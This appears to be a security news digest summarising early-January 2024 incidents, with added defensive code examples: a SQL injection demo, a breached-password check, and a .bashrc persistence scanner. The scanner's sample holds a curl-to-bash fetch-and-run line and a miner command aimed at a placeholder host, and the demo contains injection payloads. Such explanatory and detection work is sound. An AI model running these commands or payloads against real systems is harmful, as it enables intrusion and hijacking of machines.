Daily Brief

Find articles below, see 'DETAILS' for generated summaries

Total articles found: 11759

Checks for new stories every ~15 minutes

2024-01-04 21:42:01 bleepingcomputer MALWARE Ivanti Fixes Critical Remote Code Execution Bug in EPM Software
Ivanti has patched a critical RCE vulnerability in its Endpoint Management (EPM) software that allowed unauthenticated attackers to take over enrolled devices or even the core server. The vulnerability, identified as CVE-2023-39366, affects all supported versions of Ivanti EPM and has been resolved with the release of version 2022 Service Update 5. The security flaw enables attackers within the target's internal network to perform low-complexity, no-privilege attacks, utilizing SQL injection to execute arbitrary SQL queries. Ivanti asserts that there have been no known instances of this vulnerability being exploited against its customers to date. The company has limited public access to the detailed advisory on CVE-2023-39366, possibly to give customers additional time to implement protective measures against potential exploits. The article references previous incidents where state-affiliated hackers exploited two zero-day vulnerabilities in Ivanti’s EPMM software to attack Norwegian government entities, as well as a third zero-day in the company's Sentry software. Ivanti is a key player in the IT asset management space, with its products in use by over 40,000 organizations worldwide.
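The bug class behind this advisory is SQL injection. The following is an added, generic illustration in Python with sqlite3; it is not Ivanti's code and says nothing about how EPM is actually built. It shows the same device lookup written with string concatenation and with a bound parameter, run against a small constructed in-memory table, so the difference between "the input becomes SQL" and "the input stays data" is visible.

```python
import sqlite3


def seed_db() -> sqlite3.Connection:
    """Build a small in-memory inventory table (constructed sample data)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE devices (id INTEGER PRIMARY KEY, name TEXT, owner TEXT)")
    con.executemany(
        "INSERT INTO devices (name, owner) VALUES (?, ?)",
        [("lt-0001", "alice"), ("lt-0002", "bob"), ("srv-core", "admin")],
    )
    return con


def lookup_vulnerable(con: sqlite3.Connection, name: str) -> list:
    """Unsafe: the caller-supplied value is spliced into the SQL text, so quotes,
    UNION and comment sequences inside it are parsed as SQL rather than as data."""
    sql = "SELECT name, owner FROM devices WHERE name = '" + name + "'"
    return con.execute(sql).fetchall()


def lookup_safe(con: sqlite3.Connection, name: str) -> list:
    """Safe: the value is passed as a bound parameter and never reaches the SQL parser."""
    return con.execute("SELECT name, owner FROM devices WHERE name = ?", (name,)).fetchall()


if __name__ == "__main__":
    con = seed_db()
    # A tautology turns the filtered lookup into a dump of the whole table ...
    print(lookup_vulnerable(con, "' OR '1'='1"))
    # ... and a UNION reads the schema out of sqlite_master; from there an
    # attacker enumerates credential tables or writes rows the application trusts.
    print(lookup_vulnerable(con, "x' UNION SELECT sql, name FROM sqlite_master--"))
    # The parameterised version treats the same strings as literal device names.
    print(lookup_safe(con, "' OR '1'='1"))
```

The fix is the bound parameter, not input filtering: every database driver worth using supports placeholders, and an allow-list on `name` would still leave the concatenated query one missed character away from the same result.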
2024-01-04 20:05:01 theregister CYBERCRIME Mandiant Twitter Account Hijacked for Crypto Scam
Mandiant's Twitter account was compromised in a cryptocurrency scam attempt. The account posted about distributing free $PHNTM tokens from a fake website. Mandiant regained control and has launched a thorough investigation into the incident. Criminals mocked Mandiant during the takeover, suggesting they change their password and check bookmarks. The incident adds to a series of high-profile Twitter account hackings, including those of Jeff Bezos, Bill Gates, and Barack Obama in 2020. Vitalik Buterin, Ethereum co-founder, also had his account hacked recently with significant financial losses to followers. The breach is particularly concerning given Mandiant's status as a leading threat intelligence firm owned by Google. CloudSEK reports an increase in Twitter account takeovers and sales, highlighting the risks and potential damage to brand reputation.
2024-01-04 19:39:11 bleepingcomputer CYBERCRIME Russian Hackers Execute Destructive Cyberattack on Ukraine's Kyivstar
Russian hackers infiltrated Kyivstar, Ukraine's largest telecom provider, and executed a devastating cyberattack. The attack, which occurred in December, led to the shutdown of services, impacting approximately 25 million subscribers. The Security Service of Ukraine (SSU) confirmed that the network had been compromised since May 2023, with the hackers gaining full access possibly by November. Thousands of virtual servers and computers were wiped, dealing a severe blow to Kyivstar's operational core. Despite the attack's extensive damage to civilian infrastructure, Ukrainian military communications remained largely unaffected due to different communication protocols. The cyberattack was later claimed by the Russian hacking group Solntsepek, linked to the notorious Sandworm military hackers. The SSU continues to investigate the attack and assess the malware used, while an October report states Russian hackers have targeted multiple Ukrainian telecom networks since May 2023, causing service disruptions.
2024-01-04 18:42:52 bleepingcomputer CYBERCRIME Verified Twitter Accounts Hijacked for Crypto Scams
Cybercriminals are targeting Twitter accounts with "gold" and "grey" checkmarks to promote cryptocurrency scams. Google's subsidiary Mandiant's Twitter account was recently compromised to push a fake airdrop scam. MalwareHunterTeam reported several breaches, including accounts of a Canadian senator, 'The Green Grid' consortium, and a Brazilian politician. Trust inspired by the gold (companies) and grey (government) checkmarks is being exploited by hackers, leading to a rise in scam activities. A black market for selling access to compromised verified accounts has emerged, with prices ranging from $1,200 to $2,000. Threat actors also use dormant corporate accounts to create new "gold" profiles, sometimes selling these for thousands of dollars. CloudSEK advises organizations to shut down inactive accounts, strengthen security settings, and use two-factor authentication.
2024-01-04 18:32:13 theregister DATA BREACH 23andMe Faces Criticism for Shifting Blame in User Data Breach
23andMe experienced a data breach affecting the data of 6.9 million users due to compromised user credentials. The company blames the breach on users reusing passwords that had been compromised in unrelated security incidents. A lawsuit alleges the biotech firm failed to maintain reasonable security measures, which 23andMe denies. The company did not require two-factor authentication (2FA) prior to the breach but claims to have supported it since 2019. Infosec professionals criticize the response, suggesting the company should have had better security practices, like mandatory 2FA and checks for compromised credentials. There is a call within the industry for using services like HaveIBeenPwned to alert users of compromised credentials during account creation. Despite some industry support for the company's stance, the predominant view is that organizations are responsible for securing user data and should not blame users for breaches.
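The compromised-credential check mentioned above is usually done against the Have I Been Pwned "Pwned Passwords" range API, which uses k-anonymity: the client sends only the first five hex characters of the password's SHA-1 and compares the remaining 35 locally. The code below is an added example (not 23andMe's or HIBP's code). It runs offline against a constructed stand-in for one range response; the suffix for "password" is real, the other suffixes and all counts are made up, and `fetch_range` is the only part that talks to the network.

```python
import hashlib
import urllib.request
from typing import Callable, Dict, Tuple

RANGE_API = "https://api.pwnedpasswords.com/range/"


def sha1_prefix_suffix(password: str) -> Tuple[str, str]:
    """Hash the password with SHA-1 and split the hex digest into the 5-char prefix
    that is sent to the API and the 35-char suffix that is only compared locally."""
    digest = hashlib.sha1(password.encode("utf-8")).hexdigest().upper()
    return digest[:5], digest[5:]


def fetch_range(prefix: str) -> str:
    """Network fetch of every suffix sharing `prefix` (not used by the offline demo).
    Add-Padding makes the response length uninformative to a passive observer."""
    req = urllib.request.Request(
        RANGE_API + prefix,
        headers={"Add-Padding": "true", "User-Agent": "credential-check-example"},
    )
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode("utf-8")


def breach_count(suffix: str, range_body: str) -> int:
    """Parse 'SUFFIX:COUNT' lines and return the count for our suffix (0 if absent).
    Padding entries come back with a count of 0, so they never cause a false hit."""
    for line in range_body.splitlines():
        cand, _, count = line.strip().partition(":")
        if cand == suffix:
            return int(count)
    return 0


def is_compromised(password: str, fetcher: Callable[[str], str] = fetch_range) -> int:
    """Return how many times the password appears in breach corpora (0 = not seen).
    The fetcher is injectable so the logic can be exercised without network access."""
    prefix, suffix = sha1_prefix_suffix(password)
    return breach_count(suffix, fetcher(prefix))


# Constructed stand-in for the range response for prefix 5BAA6, the prefix of
# SHA-1("password"). Real responses contain several hundred lines; the first and
# third suffixes here and all counts are invented for the example.
SAMPLE_RANGES: Dict[str, str] = {
    "5BAA6": (
        "1D2D7A52F5C5B1A3D4E1F93B3C7D1A2B3C4:2\n"
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493\n"
        "2A8F2F4C6A9B0C1D2E3F405162738495A6B:0\n"
    ),
}


def offline_fetcher(prefix: str) -> str:
    """Serve the constructed sample; any other prefix yields an empty range."""
    return SAMPLE_RANGES.get(prefix, "")


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        print(f"{pw!r}: seen {is_compromised(pw, fetcher=offline_fetcher)} times")
```

At sign-up or password change the application would call `is_compromised` and reject any non-zero result; the full hash never leaves the host, so the check does not hand the password to a third party.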
2024-01-04 16:17:50 bleepingcomputer CYBERCRIME Zeppelin Ransomware Source Code Illegally Sold on Dark Web Forum
A threat actor has reportedly sold the source code and a cracked version of the Zeppelin ransomware builder for $500 on a hacker forum. The sale was identified by threat intelligence company KELA, though the authenticity of the offered package has not been confirmed. Whoever bought it could use the source to stand up a new ransomware-as-a-service (RaaS) operation or to develop new malware based on Zeppelin. The seller, known by the handle 'RET', claimed to have cracked a licensed copy of the builder and said they did not create the malware. Researchers at Unit221B found flaws in Zeppelin's encryption scheme in 2020 and quietly built a decrypter, which they disclosed in 2022; the seller asserts that the offered version no longer has these weaknesses. Zeppelin is a derivative of the Vega/VegaLocker malware, was active from 2019 to 2022, and was known for double-extortion tactics and sizeable ransom demands; the builder previously sold for up to $2,300. In 2022, the FBI warned that Zeppelin may encrypt files multiple times, so that victims need several decryption keys to recover their data.
2024-01-04 14:35:41 bleepingcomputer MISCELLANEOUS FTC Launches $25k Challenge to Combat AI Voice Cloning Frauds
The FTC is offering a $25,000 prize for ideas to detect and prevent AI-enabled voice cloning, which poses risks of fraud. Voice cloning technology's advancements have sparked concerns about its misuse in acts such as voice phishing and social engineering scams. The Voice Cloning Challenge is part of an effort to proactively address the security threat posed by sophisticated text-to-speech AI systems. While voice cloning can benefit those needing assistive communication tools, its potential for abuse in fraudulent schemes is growing. Potential solutions will be judged on feasibility, impact on corporate accountability, burden on consumer, and adaptability to technological change. The competition is open for submissions until January 12th, with a detailed proposal and optional demonstration video required. If the challenge does not produce viable defenses, the FTC sees it as a warning signal that stricter AI regulations may be necessary.
2024-01-04 13:18:23 theregister CYBERCRIME Weak Password and Malware Compromise Orange Spain's Network
Orange Spain suffered a major outage after infostealer malware harvested an employee's credentials for the company's RIPE NCC account, which was protected only by the "ridiculously weak" password "ripeadmin". An attacker using the alias "Snow" logged into the account and altered the routing records for Orange's address space, hijacking the provider's BGP announcements and cutting roughly half of the network's traffic. RIPE's lack of mandatory two-factor authentication and of any meaningful password policy left Orange Spain's critical infrastructure exposed to a single stolen password. The tampered records caused Orange's BGP routes to be rejected by networks that validate route origins, resulting in service outages for customers, though there is no evidence that customer or client data was compromised. The incident illustrates the combined risk of infostealer malware and poor credential hygiene, and experts expect similar attacks against other RIPE accounts.
2024-01-04 12:16:53 thehackernews MISCELLANEOUS Enhancing Security Across Your Software Supply Chain
The US Executive Order on Improving the Nation's Cybersecurity (EO 14028) highlights the importance of securing software supply chains, affecting anyone selling software to federal agencies and, in practice, the wider industry. Protecting secrets such as API keys and credentials is critical, as shown by high-profile incidents in which such data was exposed in plaintext. Tools like GitGuardian scan code for inadvertently published secrets, or stop them from being committed in the first place, so that leaked credentials can be rotated quickly. Building a Software Bill of Materials (SBOM) with Software Composition Analysis (SCA) tools helps track dependencies and their known vulnerabilities and makes the composition of a release transparent. Ethical hacking, the authorized probing of systems for weaknesses, helps find and fix exploitable flaws before software is released. Adopting these proactive measures and running programs such as bug bounties reduces the chance of having to manage an incident after deployment. Following the SLSA security framework can move software supply chain security "from 'safe enough' to being as resilient as possible", reducing post-deployment clean-up and regulatory reporting.
2024-01-04 11:50:57 theregister CYBERCRIME Combating Ransomware: Law Enforcement Successes and the Need for Robust Legislation
Law enforcement (LE) showcased progress against ransomware in 2023, including the takedown of high-profile gangs such as RagnarLocker, Qakbot, Hive, and partial disruption of AlphV/BlackCat. Despite successful operations by LE, the continued existence and activities of cybercrime groups like AlphV/BlackCat highlight the need for preventative measures beyond takedowns. AlphV/BlackCat, noteworthy for its reprehensible attacks including the leakage of sensitive patient data, still presents an active threat, revealing the limitations of current enforcement strategies. Discussions around combating ransomware with legislation include potentially banning ransom payments and outlawing poor security practices, though these approaches come with complications and may impact victims negatively. The article suggests that accountability and actions on cryptocurrency regulation may disrupt funding to cybercriminals, but current efforts from agencies like the UK's Financial Conduct Authority (FCA) are seen as insufficient. The fight against ransomware requires not just law enforcement actions but also the introduction of decisive policies and legislation by governments to tackle the issue more effectively. The challenge lies in crafting legislation that is effective without jeopardizing the operation of critical services like healthcare institutions, which cannot afford significant downtime. The article underscores the commitment of Western governments in continuing the fight against ransomware, acknowledging LE’s disruption efforts while stressing the need for legislative backing to reinforce and complement these efforts.
2024-01-04 10:39:23 thehackernews MALWARE Malware in Python Packages Mines Cryptocurrency on Linux
Three malicious Python packages were discovered in PyPI targeting Linux systems to deploy cryptocurrency miners. The packages, named modularseven, driftme, and catme, were downloaded 431 times before removal. Malicious code within the packages retrieved cryptocurrency mining scripts from remote servers. The malware operation resembled a previous campaign using a package called culturestreak, using similar domains and hosting strategies. Newer packages included an extra stage in the payload delivery process to avoid detection by security tools. Malicious commands were added to the ~/.bashrc file for persistence, ensuring the malware's continued operation on rebooted devices. The sophisticated evasion techniques highlight the importance of enhanced security measures for open-source repositories.
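The persistence described above (a fetch-and-run command appended to ~/.bashrc, a miner backgrounded from a hidden temp path) is something a host-based check can catch without a signature for the specific packages. The script below is an added example, not the researchers' or the packages' own code: it runs a small set of rules over shell start-up files and reports the lines that match. The sample .bashrc is constructed for the example and the host 198.51.100.7 is a documentation address, not a real C2; the rules are a starting point to tune for a given fleet, not a complete detection.

```python
import re
from pathlib import Path
from typing import Dict, List, Tuple

# Each rule: compiled pattern plus a short reason. Tuned for the behaviour the
# report describes (download piped into a shell, decoded payload, backgrounded
# miner, hidden staging directory); expect benign hits on unusual dotfiles.
RULES = [
    (re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(ba|z|da)?sh\b"), "remote script piped into a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"\bnohup\b.*&\s*$"), "backgrounded, hangup-immune process"),
    (re.compile(r"(/tmp|/var/tmp|/dev/shm)/\."), "binary staged in a hidden temp directory"),
    (re.compile(r"\b(xmrig|minerd|stratum\+tcp)\b"), "known miner name or stratum pool URL"),
]

RC_FILES = (".bashrc", ".bash_profile", ".profile", ".zshrc")

Hit = Tuple[int, str, List[str]]


def find_persistence(lines: List[str]) -> List[Hit]:
    """Return (line_number, line, [reasons]) for every line matching at least one rule."""
    hits: List[Hit] = []
    for n, line in enumerate(lines, start=1):
        reasons = [reason for pat, reason in RULES if pat.search(line)]
        if reasons:
            hits.append((n, line.rstrip("\n"), reasons))
    return hits


def scan_home(home: str) -> Dict[str, List[Hit]]:
    """Scan the shell start-up files under one home directory; keys are file paths."""
    results: Dict[str, List[Hit]] = {}
    for name in RC_FILES:
        p = Path(home) / name
        if p.is_file():
            hits = find_persistence(p.read_text(errors="replace").splitlines())
            if hits:
                results[str(p)] = hits
    return results


# Constructed sample: four ordinary lines followed by the kind of additions the
# report describes. 198.51.100.7 is from the TEST-NET-2 documentation range.
SAMPLE_BASHRC = """\
# ~/.bashrc: executed by bash(1) for non-login shells.
export PATH="$HOME/.local/bin:$PATH"
alias ll='ls -alF'
eval "$(pyenv init -)"
curl -s http://198.51.100.7/cfg.sh | bash
nohup /tmp/.sysd/unmi -o stratum+tcp://198.51.100.7:3333 >/dev/null 2>&1 &
"""

if __name__ == "__main__":
    for n, line, reasons in find_persistence(SAMPLE_BASHRC.splitlines()):
        print(f"line {n}: {line}\n    -> {', '.join(reasons)}")
```

Run `scan_home` over every home directory (and /root) from a privileged cron job or an EDR custom rule; a hit is a prompt to diff the file against a known-good copy, not proof of compromise, since developers do sometimes pipe installers into bash from their own dotfiles.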
2024-01-04 10:18:51 theregister NATION STATE ACTIVITY Chinese Balloons Detected Near Taiwan Before Elections
Four Chinese balloons were observed over the Taiwan Strait, three of which crossed over Taiwan, including near the island's Ching-Chuan-Kang air base. By comparison, the Chinese balloon shot down in US airspace in February 2023 reportedly used a US internet provider for navigation and sent data back to China; the US subsequently blacklisted six entities linked to China's military and the PLA's aerospace programs. Beijing denied any intentional airspace intrusion, but the Pentagon assessed that the balloon had intelligence-gathering capabilities. Taiwan's defense ministry is also tracking the accompanying PLA aircraft and PLAN vessels and issuing regular updates because of their frequent appearances. Balloons over Taiwan's landmass are rare; they are usually described as weather-monitoring devices, but the purpose of these remains unconfirmed. Tensions are rising because the sightings come just before Taiwan's presidential and parliamentary elections, amid increasingly strident CCP rhetoric about "reunification".
2024-01-04 09:58:06 bleepingcomputer MISCELLANEOUS Npm 'everything' Package Disrupts JavaScript Registry
The npm package registry experienced a flood of over 3,000 packages during the holidays, creating significant implications for npm authors. A package named "everything" was introduced, scripted to download the entire npm package registry, quickly exhausting a computer's storage. As a consequence of npm’s dependency policy, the existence of "everything" prevented npm authors from removing their packages since they became dependencies for "everything." The package "everything" and its sub-packages created a cumbersome dependency chain that initiated the download of millions of transitive npm packages. The creator of "everything," PatrickJS, apologized for the unintended disruptions his package caused and has reached out to npm admins for a resolution. The npm policy preventing package removal if it's a dependency for others came in response to the "left-pad" incident in 2016 to ensure stability in the programming ecosystem. Even the author of "everything" faces difficulty in removing his packages due to the complex dependency web they created, which ironically is a result of the npm policy designed to prevent such disruptions. Actions were taken to mitigate the situation, with the "@everything-registry" scoped packages linked to "everything" being set to private, presumably to stop the cascade of downloads.
2024-01-04 09:01:30 thehackernews MALWARE UAC-0050 Group Employs Novel Phishing to Spread Remcos RAT
UAC-0050, active as a threat actor since 2020, is using sophisticated phishing attacks to distribute the Remcos Remote Access Trojan (RAT). Recent attacks use a new tactic: the malware passes data between processes through Windows pipes instead of files or network sockets, in order to evade antivirus and Endpoint Detection and Response (EDR) products. The group targets Ukrainian and Polish entities with social engineering, often impersonating legitimate organizations to get recipients to open malicious attachments. One phishing email purporting to offer consultancy roles with the Israel Defense Forces (IDF) was part of the campaign, aimed primarily at Ukrainian military personnel. CERT-UA attributed a phishing campaign to UAC-0050 in February 2023, likewise delivering Remcos RAT and occasionally the information stealer Meduza Stealer. Analysis of a specific LNK file revealed a multi-stage infection chain: staged script execution followed by the download of additional payloads for persistence and data harvesting. Remcos can extract system data and credentials from a variety of web browsers, further compromising infected systems.
2024-01-04 06:33:34 thehackernews CYBERCRIME Mandiant Twitter Account Hijacked for Crypto Scam Operation
American cybersecurity firm Mandiant's Twitter account was hijacked to promote a cryptocurrency scam. During the incident, which lasted over six hours, the account was renamed and used to impersonate the Phantom crypto wallet service. The scam took the form of a fake airdrop promotion that encouraged users to visit a malicious link. It is unclear how the takeover occurred; possibilities include an MFA bypass or a compromise of Twitter support staff. Mandiant, a prominent threat intelligence firm, is a subsidiary of Google Cloud following a $5.4 billion acquisition. Mandiant has regained control of its Twitter account, but has not yet detailed the account's security posture after the incident. The attacker's identity remains unknown, and further details are expected when Mandiant issues a statement.